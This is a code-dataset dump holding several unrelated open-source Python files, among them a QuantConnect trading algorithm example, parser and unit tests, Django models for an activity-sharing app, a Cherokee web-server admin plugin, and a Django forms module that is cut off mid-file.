code
stringlengths
3
1.05M
repo_name
stringlengths
5
104
path
stringlengths
4
251
language
stringclasses
1 value
license
stringclasses
15 values
size
int64
3
1.05M
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import clr clr.AddReference("System") clr.AddReference("QuantConnect.Algorithm") clr.AddReference("QuantConnect.Common") from System import * from QuantConnect import * from QuantConnect.Algorithm import * from QuantConnect.Brokerages import * class CustomBrokerageErrorHandlerAlgorithm(QCAlgorithm): '''QCU How do I handle brokerage messages in a custom way? Often you may want more stability and fault tolerance so you may want to control what happens with brokerage messages. Using the custom messaging handler you can ensure your algorithm continues operation through connection failures.''' def Initialize(self): '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.''' self.SetStartDate(2013,10,07) #Set Start Date self.SetEndDate(2013,10,11) #Set End Date self.SetCash(100000) #Set Strategy Cash # Find more symbols here: http://quantconnect.com/data self.AddSecurity(SecurityType.Equity, "SPY") #Set the brokerage message handler: self.SetBrokerageMessageHandler(CustomBrokerageMessageHandler(self)) def OnData(self, data): '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here. Arguments: data: Slice object keyed by symbol containing the stock data ''' if self.Portfolio.HoldStock: return self.Order("SPY", 100) self.Debug("Purchased SPY on {0}".format(self.Time.ToShortDateString())) class CustomBrokerageMessageHandler(IBrokerageMessageHandler): '''Handle the error messages in a custom manner''' def __init__(self, algo): self._algo = algo def Handle(self, message): '''Process the brokerage message event. Trigger any actions in the algorithm or notifications system required. Arguments: message: Message object ''' toLog = "{0} Event: {1}".format(self._algo.Time.ToString("o"), message.Message) self._algo.Debug(toLog) self._algo.Log(toLog)
devalkeralia/Lean
Algorithm.Python/CustomBrokerageErrorHandlerAlgorithm.py
Python
apache-2.0
2,901
import datetime from ecl.util.util import BoolVector from ecl.util.test import TestAreaContext from tests import ResTest from res.enkf import ObsBlock class ObsBlockTest(ResTest): def test_create(self): block = ObsBlock("OBS" , 1000) self.assertTrue( isinstance( block , ObsBlock )) self.assertEqual( 1000 , block.totalSize()) self.assertEqual( 0 , block.activeSize()) def test_access(self): obs_size = 10 block = ObsBlock("OBS" , obs_size) with self.assertRaises(IndexError): block[100] = (1,1) with self.assertRaises(IndexError): block[-100] = (1,1) with self.assertRaises(TypeError): block[4] = 10 with self.assertRaises(TypeError): block[4] = (1,1,9) #------ with self.assertRaises(IndexError): v = block[100] with self.assertRaises(IndexError): v = block[-100] block[0] = (10,1) v = block[0] self.assertEqual( v , (10,1)) self.assertEqual( 1 , block.activeSize()) block[-1] = (17,19) self.assertEqual( block[-1], (17,19))
andreabrambilla/libres
python/tests/res/enkf/test_obs_block.py
Python
gpl-3.0
1,177
#!/usr/bin/env python # -*- encoding: utf-8 -*- """Test case for pyparser.""" from __future__ import division, print_function import os import re import textwrap import tokenize from future.builtins import open import pyparser def _make_tuple(op): return lambda x: (op, x) NL = tokenize.NL NEWLINE = tokenize.NEWLINE NAME = _make_tuple(tokenize.NAME) OP = _make_tuple(tokenize.OP) INDENT = tokenize.INDENT DEDENT = tokenize.DEDENT COMMENT = tokenize.COMMENT STRING = tokenize.STRING NUMBER = tokenize.NUMBER END = tokenize.ENDMARKER token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT", STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"} Ws = pyparser.Whitespace Comment = pyparser.Comment Comment_banner = (pyparser.Comment, "banner") Comment_code = (pyparser.Comment, "code") Docstring = pyparser.Docstring Import_future = (pyparser.ImportBlock, "future") Import_stdlib = (pyparser.ImportBlock, "stdlib") Import_3rdpty = (pyparser.ImportBlock, "third-party") Import_1stpty = (pyparser.ImportBlock, "first-party") Expression = pyparser.Expression Function = (pyparser.Callable, "def") Class = (pyparser.Callable, "class") def assert_same_code(code1, code2): """Verify whether 2 code fragments are identical, and if not print an error message.""" regex = re.compile(r"\s+\\$", re.M) code1 = re.sub(regex, r"\\", code1) code2 = re.sub(regex, r"\\", code2) if code2 != code1: print() lines_code1 = code1.splitlines() lines_code2 = code2.splitlines() n_diffs = 0 for i in range(len(lines_code1)): old_line = lines_code1[i] new_line = lines_code2[i] if i < len(lines_code2) else "" if old_line != new_line: print("%3d - %s" % (i + 1, old_line)) print("%3d + %s" % (i + 1, new_line)) n_diffs += 1 if n_diffs == 5: break raise AssertionError("Unparsed code1 does not match the original.") def test_tokenization(): """ Test function for ``pyparser._normalize_tokens()``. Even though this function is private, it is extremely important to verify that it behaves correctly. In particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it fixes all the problems that the original tokenizer has. """ # Helper functions def _parse_to_tokens(text): """Parse text into tokens and then normalize them.""" gen = iter(text.splitlines(True)) # True = keep newlines readline = gen.next if hasattr(gen, "next") else gen.__next__ return pyparser._tokenize(readline) def _unparse_tokens(tokens): """Convert tokens back into the source code.""" return tokenize.untokenize(t.token for t in tokens) def _assert_tokens(tokens, target): """Check that the tokens list corresponds to the target provided.""" for i in range(len(tokens)): assert i < len(target), "Token %d %r not expected" % (i, tokens[i]) tok = tokens[i] trg = target[i] valid = False if isinstance(trg, int): if tok.op == trg: valid = True name = token_names[trg] elif isinstance(trg, tuple) and len(trg) == 2: if tok.op == trg[0] and tok.str == trg[1]: valid = True name = "%s(%s)" % (token_names[trg[0]], trg[1]) else: assert False, "Unknown target: %r" % trg if not valid: assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name) assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target)) def check_code(code, expected_tokens=None, filename=None): """Test parsing of the given piece of code.""" code = textwrap.dedent(code) if filename: print("Testing tokenization of %s:" % filename, end=" ") else: check_code.index = getattr(check_code, "index", 0) + 1 print("Testing tokenization %d:" % check_code.index, end=" ") tokens = _parse_to_tokens(code) try: try: unparsed = _unparse_tokens(tokens) except ValueError as e: raise AssertionError("Cannot unparse tokens: %s" % e) assert_same_code(code, unparsed) if expected_tokens: _assert_tokens(tokens, expected_tokens) print("ok") except AssertionError as e: print(u"Error: %s" % e) print(u"Original code fragment:\n" + code) print("Tokens:") for i, tok in enumerate(tokens): print("%3d %r" % (i, tok)) raise check_code(""" try: while True: pass # comment except: pass """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"), NAME("pass"), NEWLINE, END] ) check_code(""" try: while True: pass # comment except: pass """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"), NAME("pass"), NEWLINE, END] ) check_code(""" try: while True: pass # comment except: pass """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"), NAME("pass"), NEWLINE, END] ) check_code(""" def func(): # function pass """, [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("pass"), NEWLINE, DEDENT, END]) check_code(""" def func(): # function # hanging comment pass """, [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL, NAME("pass"), NEWLINE, DEDENT, END]) check_code(""" def foo(): pass #comment def bar(): pass """, [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, END]) check_code(""" def hello(): print("hello") """, [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END]) check_code(""" class Foo: def foo(self): pass def bar(self): return """, [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT, DEDENT, END]) check_code(""" def foo(): # Attempt to create the output directory try: os.makedirs(destdir) except OSError as e: raise """, [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"), NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT, NAME("raise"), NEWLINE, DEDENT, DEDENT, END]) check_code(""" if PY2: def unicode(): raise RuntimeError # disable this builtin function # because it doesn't exist in Py3 handler = lambda: None # noop # (will redefine later) ################################################################################ # comment 1 print("I'm done.") """, [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL, DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END]) check_code(""" def test3(): x = 1 # bad print(x) """, [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="), NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END]) check_code(""" class Foo(object): #------------- def bar(self): if True: pass # Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel # all the way up across multiple comments. # comment 3 # commmmmmmment 4 @decorator """, [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, OP("@"), NAME("decorator"), NEWLINE, END]) # Really, one should avoid code like this.... It won't break the normalizer, but may create problems down # the stream. check_code(""" if True: if False: # INDENT will be inserted before this comment raise # DEDENT will be after this comment else: praise() """, [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE, INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END]) for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]: absdir = os.path.abspath(directory) for dir_name, subdirs, files in os.walk(absdir): for f in files: if f.endswith(".py"): filename = os.path.join(dir_name, f) with open(filename, "rt", encoding="utf-8") as fff: check_code(fff.read(), filename=filename) def test_pyparser(): """Test case: general parsing.""" def _check_blocks(actual, expected): assert actual, "No parse results" for i in range(len(actual)): assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i]) valid = False if isinstance(expected[i], type): if isinstance(actual[i], expected[i]): valid = True elif isinstance(expected[i], tuple): if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True if not valid: assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i]) def check_code(code, blocks=None, filename=None): code = textwrap.dedent(code) if not code.endswith("\n"): code += "\n" if filename: print("Testing file %s..." % filename, end=" ") else: check_code.index = getattr(check_code, "index", 0) + 1 print("Testing code fragment %d..." % check_code.index, end=" ") preparsed = None parsed = None unparsed = None try: preparsed = pyparser.parse_text(code) parsed = preparsed.parse(2) try: unparsed = parsed.unparse() except ValueError as e: for i, tok in enumerate(parsed.tokens): print("%3d %r" % (i, tok)) raise AssertionError("Cannot unparse code: %s" % e) assert_same_code(code, unparsed) if blocks: _check_blocks(parsed.parsed, blocks) print("ok") except AssertionError as e: print() print(u"Error: " + str(e)) print(u"Original code fragment:\n" + code) if unparsed: print(u"Unparsed code:\n" + unparsed) if parsed: print(parsed) for i, tok in enumerate(parsed.tokens): print("%3d %r" % (i, tok)) raise except Exception as e: print() print(u"Error: " + str(e)) if preparsed: print("Preparsed tokens:") for i, tok in enumerate(preparsed.tokens): print("%4d %r" % (i, tok)) else: print("Initial parsing has failed...") raise check_code(""" # -*- encoding: utf-8 -*- # copyright: 2016 h2o.ai \"\"\" A code example. It's not supposed to be functional, or even functionable. \"\"\" from __future__ import braces, antigravity # Standard library imports import sys import time import this import h2o from h2o import H2OFrame, init from . import * # Do some initalization for legacy python versions if PY2: def unicode(): raise RuntimeError # disable this builtin function # because it doesn't exist in Py3 handler = lambda: None # noop # (will redefine later) ################################################################################ # comment 1 class Foo(object): #------ Public ------------------------------------------------------------- def bar(self): pass # def foo(): # print(1) # # print(2) # comment 2 @decorated( 1, 2, (3)) @dddd def bar(): # be # happy print("bar!") # bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression, Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws]) for directory in [".", "../../h2o-py", "../../py"]: absdir = os.path.abspath(directory) for dir_name, subdirs, files in os.walk(absdir): for f in files: if f.endswith(".py"): filename = os.path.join(dir_name, f) with open(filename, "rt", encoding="utf-8") as fff: check_code(fff.read(), filename=filename) # test_tokenization() test_pyparser()
h2oai/h2o-3
h2o-bindings/bin/pyunit_parser_test.py
Python
apache-2.0
15,752
from pyston.order.sorters import BaseSorter from pyston.order.managers import BaseParserModelOrderManager from pyston.order.utils import DIRECTION class DynamoSorter(BaseSorter): def get_order_term(self): return self.direction == DIRECTION.ASC class DynamoOrderManager(BaseParserModelOrderManager): def _sort_queryset(self, qs, terms): for term in terms: qs = qs.set_scan_index_forward(term) return qs def _get_sorter_from_model(self, identifiers_prefix, identifiers, direction, model, resource, request, order_fields_rfs): if len(identifiers) == 1: current_identifier = self._get_real_field_name(resource, identifiers[0]) if current_identifier == resource.get_range_key(): return DynamoSorter(identifiers_prefix + identifiers, direction) return None
druids/django-pyston
pyston/contrib/dynamo/order.py
Python
bsd-3-clause
893
from datetime import timedelta import pytz from dateutil.relativedelta import relativedelta from dateutil.rrule import rrulestr from django.conf import settings from django.core.validators import MinValueValidator, MaxValueValidator from django.utils.translation import gettext as _ from django.db import models from django.db import transaction from django.db.models import Count, DurationField, F, Q, Sum from django.utils import timezone from karrot.base.base_models import BaseModel, CustomDateTimeTZRange, CustomDateTimeRangeField, UpdatedAtMixin from karrot.conversations.models import ConversationMixin from karrot.history.models import History, HistoryTypus from karrot.activities import stats from karrot.activities.utils import match_activities_with_dates, rrule_between_dates_in_local_time from karrot.places.models import PlaceStatus class ActivityTypeStatus(models.TextChoices): ACTIVE = 'active' ARCHIVED = 'archived' class ActivityType(BaseModel, UpdatedAtMixin): group = models.ForeignKey('groups.Group', on_delete=models.CASCADE, related_name='activity_types') name = models.CharField(max_length=80) name_is_translatable = models.BooleanField(default=True) colour = models.CharField(max_length=6) icon = models.CharField(max_length=100) feedback_icon = models.CharField(max_length=100) has_feedback = models.BooleanField(default=True) has_feedback_weight = models.BooleanField(default=True) status = models.CharField( default=ActivityTypeStatus.ACTIVE.value, choices=ActivityTypeStatus.choices, max_length=100, ) class Meta: unique_together = ('group', 'name') def get_translated_name(self): # the translations are collected via activity_types.py return _(self.name) if self.name_is_translatable else self.name class ActivitySeriesQuerySet(models.QuerySet): @transaction.atomic def update_activities(self): for series in self.filter(activity_type__status=ActivityTypeStatus.ACTIVE.value, place__status=PlaceStatus.ACTIVE.value): series.update_activities() def annotate_timezone(self): return self.annotate(timezone=F('place__group__timezone')) class ActivitySeriesManager(models.Manager.from_queryset(ActivitySeriesQuerySet)): def get_queryset(self): return super().get_queryset().annotate_timezone() class ActivitySeries(BaseModel): objects = ActivitySeriesManager() place = models.ForeignKey('places.Place', related_name='series', on_delete=models.CASCADE) max_participants = models.PositiveIntegerField(blank=True, null=True) rule = models.TextField() start_date = models.DateTimeField() description = models.TextField(blank=True) duration = DurationField(null=True) activity_type = models.ForeignKey( ActivityType, related_name='activity_series', on_delete=models.CASCADE, ) last_changed_by = models.ForeignKey( settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='changed_series', null=True, ) def create_activity(self, date): return self.activities.create( activity_type=self.activity_type, date=CustomDateTimeTZRange(date, date + (self.duration or default_duration)), has_duration=self.duration is not None, max_participants=self.max_participants, series=self, place=self.place, description=self.description, last_changed_by=self.last_changed_by, ) def period_start(self): # shift start time slightly into future to avoid activities which are only valid for very short time return timezone.now() + relativedelta(minutes=5) def dates(self): return rrule_between_dates_in_local_time( rule=self.rule, dtstart=self.start_date, tz=self.get_timezone(), period_start=self.period_start(), period_duration=relativedelta(weeks=self.place.weeks_in_advance) ) def get_timezone(self): value = self.timezone if hasattr(self, 'timezone') else self.place.group.timezone return pytz.timezone(value) if isinstance(value, str) else value def get_matched_activities(self): return match_activities_with_dates( activities=self.activities.order_by('date').filter(date__startswith__gt=self.period_start()), new_dates=self.dates(), ) def update_activities(self): """ create new activities and delete empty activities that don't match series """ for activity, date in self.get_matched_activities(): if not activity: self.create_activity(date) elif not date: if activity.participants.count() < 1: activity.delete() def __str__(self): return 'ActivitySeries {} - {}'.format(self.rule, self.place) def save(self, *args, **kwargs): old = type(self).objects.get(pk=self.pk) if self.pk else None super().save(*args, **kwargs) if not old or old.start_date != self.start_date or old.rule != self.rule: self.update_activities() if old: description_changed = old.description != self.description max_participants_changed = old.max_participants != self.max_participants duration_changed = old.duration != self.duration if description_changed or max_participants_changed or duration_changed: for activity in self.activities.upcoming(): if description_changed and old.description == activity.description: activity.description = self.description if max_participants_changed and old.max_participants == activity.max_participants: activity.max_participants = self.max_participants if duration_changed: if self.duration: activity.has_duration = True activity.date = CustomDateTimeTZRange( activity.date.start, activity.date.start + self.duration ) else: activity.has_duration = False activity.date = CustomDateTimeTZRange( activity.date.start, activity.date.start + default_duration ) activity.save() def delete(self, **kwargs): self.rule = str(rrulestr(self.rule).replace(dtstart=self.start_date, until=timezone.now())) self.update_activities() return super().delete() class ActivityQuerySet(models.QuerySet): def _feedback_possible_q(self, user): return Q(is_done=True) \ & Q(activity_type__has_feedback=True) \ & Q(date__endswith__gte=timezone.now() - relativedelta(days=settings.FEEDBACK_POSSIBLE_DAYS)) \ & Q(participants=user) \ & ~Q(feedback__given_by=user) \ & Q(activityparticipant__feedback_dismissed=False) def only_feedback_possible(self, user): return self.filter(self._feedback_possible_q(user)) def exclude_feedback_possible(self, user): return self.filter(~self._feedback_possible_q(user)) def annotate_num_participants(self): return self.annotate(num_participants=Count('participants')) def annotate_timezone(self): return self.annotate(timezone=F('place__group__timezone')) def annotate_feedback_weight(self): return self.annotate(feedback_weight=Sum('feedback__weight')) def exclude_disabled(self): return self.filter(is_disabled=False) def in_group(self, group): return self.filter(place__group=group) def due_soon(self): in_some_hours = timezone.now() + relativedelta(hours=settings.ACTIVITY_DUE_SOON_HOURS) return self.exclude_disabled().filter(date__startswith__gt=timezone.now(), date__startswith__lt=in_some_hours) def missed(self): return self.exclude_disabled().filter(date__startswith__lt=timezone.now(), participants=None) def done(self): return self.exclude_disabled().filter(date__startswith__lt=timezone.now())\ .annotate_num_participants().filter(num_participants__gt=0) def done_not_full(self): return self.exclude_disabled() \ .annotate(participant_count=Count('participants')) \ .filter(date__startswith__lt=timezone.now(), participant_count__lt=F('max_participants')) def upcoming(self): return self.filter(date__startswith__gt=timezone.now()) @transaction.atomic def process_finished_activities(self): """ find all activities that are in the past and didn't get processed yet add them to history and mark as processed """ for activity in self.exclude_disabled().filter( is_done=False, date__startswith__lt=timezone.now(), ): if not activity.place.is_active(): # Make sure we don't process this activity again, even if the place gets active in future activity.is_disabled = True activity.save() continue payload = {} payload['activity_date'] = activity.id if activity.series: payload['series'] = activity.series.id if activity.max_participants: payload['max_participants'] = activity.max_participants if activity.participants.count() == 0: stats.activity_missed(activity) History.objects.create( typus=HistoryTypus.ACTIVITY_MISSED, group=activity.place.group, place=activity.place, activity=activity, date=activity.date.start, payload=payload, ) else: stats.activity_done(activity) History.objects.create( typus=HistoryTypus.ACTIVITY_DONE, group=activity.place.group, place=activity.place, activity=activity, users=activity.participants.all(), date=activity.date.start, payload=payload, ) activity.is_done = True activity.save() class ActivityManager(models.Manager.from_queryset(ActivityQuerySet)): def get_queryset(self): return super().get_queryset().annotate_timezone() default_duration = timedelta(minutes=30) def default_activity_date_range(): return CustomDateTimeTZRange(timezone.now(), timezone.now() + default_duration) def to_range(date, **kwargs): duration = timedelta(**kwargs) if kwargs else default_duration return CustomDateTimeTZRange(date, date + duration) class Activity(BaseModel, ConversationMixin): objects = ActivityManager() class Meta: ordering = ['date'] activity_type = models.ForeignKey( ActivityType, related_name='activities', on_delete=models.CASCADE, ) series = models.ForeignKey( 'ActivitySeries', related_name='activities', on_delete=models.SET_NULL, null=True, ) place = models.ForeignKey( 'places.Place', related_name='activities', on_delete=models.CASCADE, ) participants = models.ManyToManyField( settings.AUTH_USER_MODEL, related_name='activities', through='ActivityParticipant', through_fields=('activity', 'user') ) feedback_given_by = models.ManyToManyField( settings.AUTH_USER_MODEL, related_name='feedback_about_activities', through='Feedback', through_fields=('about', 'given_by') ) date = CustomDateTimeRangeField(default=default_activity_date_range) has_duration = models.BooleanField(default=False) description = models.TextField(blank=True) max_participants = models.PositiveIntegerField(null=True) is_disabled = models.BooleanField(default=False) last_changed_by = models.ForeignKey( settings.AUTH_USER_MODEL, null=True, related_name='activities_changed', on_delete=models.SET_NULL, ) is_done = models.BooleanField(default=False) @property def group(self): return self.place.group @property def ended_at(self): if self.is_not_past(): return None return self.date.end def __str__(self): return 'Activity {} - {}'.format(self.date.start, self.place) def get_timezone(self): value = self.timezone if hasattr(self, 'timezone') else self.group.timezone return pytz.timezone(value) if isinstance(value, str) else value def feedback_due(self): if not self.activity_type.has_feedback: return None due = self.date.end + relativedelta(days=settings.FEEDBACK_POSSIBLE_DAYS) return due.astimezone(self.get_timezone()) def is_upcoming(self): return self.date.start > timezone.now() def is_past(self): return self.date.end < timezone.now() def is_not_past(self): return not self.is_past() def is_full(self): if not self.max_participants: return False return self.participants.count() >= self.max_participants def is_participant(self, user): return self.participants.filter(id=user.id).exists() def is_empty(self): return self.participants.count() == 0 def is_recent(self): return self.date.start >= timezone.now() - relativedelta(days=settings.FEEDBACK_POSSIBLE_DAYS) def empty_participants_count(self): return max(0, self.max_participants - self.participants.count()) def add_participant(self, user): participant, _ = ActivityParticipant.objects.get_or_create( activity=self, user=user, ) return participant def remove_participant(self, user): ActivityParticipant.objects.filter( activity=self, user=user, ).delete() def dismiss_feedback(self, user): activity_participant = ActivityParticipant.objects.get( activity=self, user=user, ) activity_participant.feedback_dismissed = True activity_participant.save() def save(self, *args, **kwargs): if not self.has_duration: # reset duration to default if activity has no explicit duration start = self.date.start self.date = CustomDateTimeTZRange(start, start + default_duration) super().save(*args, **kwargs) class ActivityParticipant(BaseModel): activity = models.ForeignKey( Activity, on_delete=models.CASCADE, ) user = models.ForeignKey( settings.AUTH_USER_MODEL, on_delete=models.CASCADE, ) feedback_dismissed = models.BooleanField(default=False) reminder_task_id = models.TextField(null=True) # stores a huey task id class Meta: db_table = 'activities_activity_participants' unique_together = (('activity', 'user'), ) ordering = ['created_at'] class Feedback(BaseModel): given_by = models.ForeignKey('users.User', on_delete=models.CASCADE, related_name='feedback') about = models.ForeignKey('Activity', on_delete=models.CASCADE) weight = models.FloatField( blank=True, null=True, validators=[MinValueValidator(-0.01), MaxValueValidator(10000.0)] ) comment = models.CharField(max_length=settings.DESCRIPTION_MAX_LENGTH, blank=True) # just to store legacy values for when feedback_as_sum was False on activities... null otherwise # I guess can remove it after a while... weight_for_average = models.FloatField(null=True) class Meta: unique_together = ('about', 'given_by')
yunity/foodsaving-backend
karrot/activities/models.py
Python
agpl-3.0
16,263
# -*- coding: utf-8 -*- # # Cheroke-admin # # Authors: # Alvaro Lopez Ortega <alvaro@alobbs.com> # # Copyright (C) 2001-2014 Alvaro Lopez Ortega # # This program is free software; you can redistribute it and/or # modify it under the terms of version 2 of the GNU General Public # License as published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA # 02110-1301, USA. # import CTK URL_APPLY = '/plugin/rehost/apply' NOTE_REHOST = N_("Regular Expression against which the hosts be Host name will be compared.") WARNING_EMPTY = N_("At least one Regular Expression string must be defined.") class Content (CTK.Container): def __init__ (self, refreshable, key, url_apply, **kwargs): CTK.Container.__init__ (self, **kwargs) entries = CTK.cfg.keys (key) # Warning message if not entries: notice = CTK.Notice('warning') notice += CTK.RawHTML (_(WARNING_EMPTY)) self += notice # List else: table = CTK.Table() submit = CTK.Submitter(url_apply) submit += table self += CTK.Indenter(submit) table.set_header(1) table += [CTK.RawHTML(_('Regular Expressions'))] for i in entries: e1 = CTK.TextCfg ("%s!%s"%(key,i)) rm = None if len(entries) >= 2: rm = CTK.ImageStock('del') rm.bind('click', CTK.JS.Ajax (url_apply, data = {"%s!%s"%(key,i): ''}, complete = refreshable.JS_to_refresh())) table += [e1, rm] # Add New table = CTK.PropsTable() next = CTK.cfg.get_next_entry_prefix (key) table.Add (_('New Regular Expression'), CTK.TextCfg(next, False, {'class':'noauto'}), _(NOTE_REHOST)) submit = CTK.Submitter(url_apply) dialog = CTK.Dialog2Buttons ({'title': _('Add New Entry')}, _('Add'), submit.JS_to_submit()) submit += table submit.bind ('submit_success', refreshable.JS_to_refresh()) submit.bind ('submit_success', dialog.JS_to_close()) dialog += submit self += dialog add_new = CTK.Button(_('Add new entry…')) add_new.bind ('click', dialog.JS_to_show()) self += add_new class Plugin_rehost (CTK.Plugin): def __init__ (self, key, vsrv_num): CTK.Plugin.__init__ (self, key) pre = '%s!regex' %(key) url_apply = '%s/%s' %(URL_APPLY, vsrv_num) self += CTK.RawHTML ("<h2>%s</h2>" % (_('New Regular Expression'))) # Content refresh = CTK.Refreshable ({'id': 'plugin_rehost'}) refresh.register (lambda: Content(refresh, pre, url_apply).Render()) self += refresh # Validation, and Public URLs CTK.publish ('^%s/[\d]+'%(URL_APPLY), CTK.cfg_apply_post, method="POST")
cherokee/webserver
admin/plugins/rehost.py
Python
gpl-2.0
3,388
# -*- coding: utf-8 -*- """Formulaires de l'application.""" from django import forms from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User from .models import Station from .models import Passenger from django.core.exceptions import ValidationError def validate_station(value): if not value or not Station.objects.filter(name=value).exists(): raise ValidationError("La gare de %(value)s n'existe pas.", code='notfound', params={'value': value}) class SearchForm(forms.Form): """Formulaire de recherche de trajets.""" ## Options disponibles pour l'heure # Permet de demander à l'utilisateur s'il veut partir après ou arriver # avant l'heure qu'il spécifie. TIME_OPTIONS = [ ('DEPART_AFTER', 'Partir après'), ('ARRIVE_BEFORE', 'Arriver avant') ] ## Champ indiquant le nom de la gare de départ. startStation = forms.CharField(max_length=40, required=True, validators=[validate_station]) ## Champ indiquant le nom de la gare d'arrivée. endStation = forms.CharField(max_length=40, required=True, validators=[validate_station]) ## Champ indiquant la date souhaitée du voyage. travelDate = forms.DateField(required=True) ## Champ utilisé pour les options de l'heure (voir TIME_OPTIONS). timeOptions = forms.ChoiceField(choices=TIME_OPTIONS) ## Champ utilisé pour la sélection du créneau horaire. hour = forms.ChoiceField(choices=[(str(i), str(i)) for i in range(5, 22)]) def __init__(self, *args, **kwargs): """Instancier un formulaire de recherche.""" ps = kwargs.pop('passengers') super(SearchForm, self).__init__(*args, **kwargs) passengers = forms.MultipleChoiceField( required=len(ps) > 0, choices=[(str(p.id), str(p)) for p in ps]) class SignUpForm(UserCreationForm): """Formulaire d'inscription à l'application.""" ## Champ du prénom de l'utilisateur first_name = forms.CharField(max_length=30, required=False, help_text='Optional.') ## Champ du nom de l'utilisateur last_name = forms.CharField(max_length=30, required=False, help_text='Optional.') ## Champ pour l'adresse e-mail de l'utilisateur email = forms.EmailField( max_length=254, help_text='Required. Inform a valid email address.') class Meta: """Métadonnées du formulaire d'inscription à l'application.""" ## Modèle associé au formulaire. model = User ## Indiquer les champs du formulaire. # Permet d'hériter automatiquement des champs depuis le formulaire # par défaut pour l'utilisateur Django. fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', ) class UserForm(forms.ModelForm): """Formulaire de mise à jour d'un 